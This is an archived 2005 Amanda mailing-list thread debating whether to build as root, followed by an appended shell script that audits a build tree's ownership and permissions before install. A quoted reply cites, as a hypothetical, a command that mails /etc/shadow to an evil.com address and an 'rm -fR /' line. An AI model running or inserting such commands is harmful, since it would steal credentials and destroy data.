Amanda-Users

Re: Fedora Core 3 - which version of tar??

2005-01-21 23:15:31
Subject: Re: Fedora Core 3 - which version of tar??
From: Gene Heskett <gene.heskett AT verizon DOT net>
To: amanda-users AT amanda DOT org
Date: Fri, 21 Jan 2005 23:09:10 -0500
On Friday 21 January 2005 19:15, Frank Smith wrote:
>--On Friday, January 21, 2005 18:18:52 -0500 Eric Siegerman <erics AT telepres DOT com> wrote:
>> On Thu, Jan 20, 2005 at 10:22:16PM +0100, Stefan G. Weichinger wrote:
>>> - configure and make as $AMANDAUSER
>>
>> I don't believe this is necessary.  One should avoid building
>> Amanda as root, but that's not because it'll cause problems for
>> Amanda; it's for the same reason one should avoid building
>> *anything* as root.
>
>Sorry for hijacking a thread, but playing devil's advocate here,
>what difference does it really make whether you build as root
>or not if you run 'make install' as root?  How many people
>actually go through each line of the makefile, or run make -n
>first and examine all that, plus look through the code itself?

You will have the wrong permissions all over the place if you build 
amanda as root.  Only the install should be done as root.  This is 
basic security.  Go ahead, build it as root and install it.  I've 
never been able to make it run that way, ever.  There are good 
security reasons for doing it in the sequence we recommend, and the 
clues that this is what happened when someone asks a question are 
like flashing red lights to those of us who have played this game.

>   In Amanda's case, for example, if the source for runtar
>contained code to 'mailx hax0r AT evil DOT com < /etc/shadow' or
>'rm -fR /' would it really make any difference what user it
>was compiled under?  Would they notice even if it wasn't buried
>in the source, but was just part of the 'install' target in
>the makefile (or an included subdirectory makefile)?
>   For user programs, compiling and installing as a user
>can limit the damage that can be done, but if any part of
>the build, install, or execution ever has root privileges
>then you really aren't increasing your security by building
>as a normal user and installing as root.
>   All that said, I generally do build as a normal user, as
>it can expose permission problems on libraries, paths, etc.
>at build time instead of later when users are trying to run
>the program.
>
>Frank
>
>> I've never had a problem building Amanda under my own user
>> account, and it's hard to see why such a problem might ever
>> occur.
>>
>>> make install as root
>>
>> This *is* necessary, of course.
>>
>> --
>>
>>|  | /\
>>|
>>| -_|/  >   Eric Siegerman, Toronto, Ont.        erics AT telepres DOT com
>>|
>>|  |  /
>>
>> The animal that coils in a circle is the serpent; that's why so
>> many cults and myths of the serpent exist, because it's hard to
>> represent the return of the sun by the coiling of a hippopotamus.
>>      - Umberto Eco, "Foucault's Pendulum"

-- 
Cheers, Gene
"There are four boxes to be used in defense of liberty:
 soap, ballot, jury, and ammo. Please use in that order."
-Ed Howdershelt (Author)
99.32% setiathome rank, not too shabby for a WV hillbilly
Yahoo.com attorneys please note, additions to this message
by Gene Heskett are:
Copyright 2005 by Maurice Eugene Heskett, all rights reserved.
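
The thread's sequence (configure and make as $AMANDAUSER, then make install as root) can be checked before the root step. The following is an added example, not part of any message in this thread and not Amanda's own tooling: it inspects a build tree for files not owned by the build user and for world-writable paths that root would then install from. The function names and the tree path in the usage comment are hypothetical.

```shell
#!/bin/sh
# Added example: pre-install audit of a source tree that was meant to be
# built as an unprivileged user. All function names are hypothetical.

# List paths under tree $1 that are NOT owned by build user $2
# (login name or numeric uid). Root-owned objects here suggest that
# configure or make was run as root.
foreign_owned() {
    find "$1" ! -user "$2" -print
}

# List world-writable files and directories under tree $1. Any local
# account could alter these before root runs 'make install' from them.
world_writable() {
    find "$1" ! -type l -perm -002 -print
}

# Return 0 only if the tree exists and both checks come back empty;
# otherwise print the findings and return non-zero.
preinstall_check() {
    tree=$1 owner=$2 rc=0
    if [ ! -d "$tree" ]; then
        printf 'no such build tree: %s\n' "$tree"
        return 2
    fi
    bad=$(foreign_owned "$tree" "$owner")
    if [ -n "$bad" ]; then
        printf 'not owned by %s:\n%s\n' "$owner" "$bad"
        rc=1
    fi
    bad=$(world_writable "$tree")
    if [ -n "$bad" ]; then
        printf 'world-writable:\n%s\n' "$bad"
        rc=1
    fi
    return "$rc"
}

# Usage (path is an assumed example), run before the root install step:
#   preinstall_check /home/amanda/src/amanda "$AMANDAUSER" && make install
```

This only confirms who built the tree and who can write to it; it does not inspect what the makefile's install target will do.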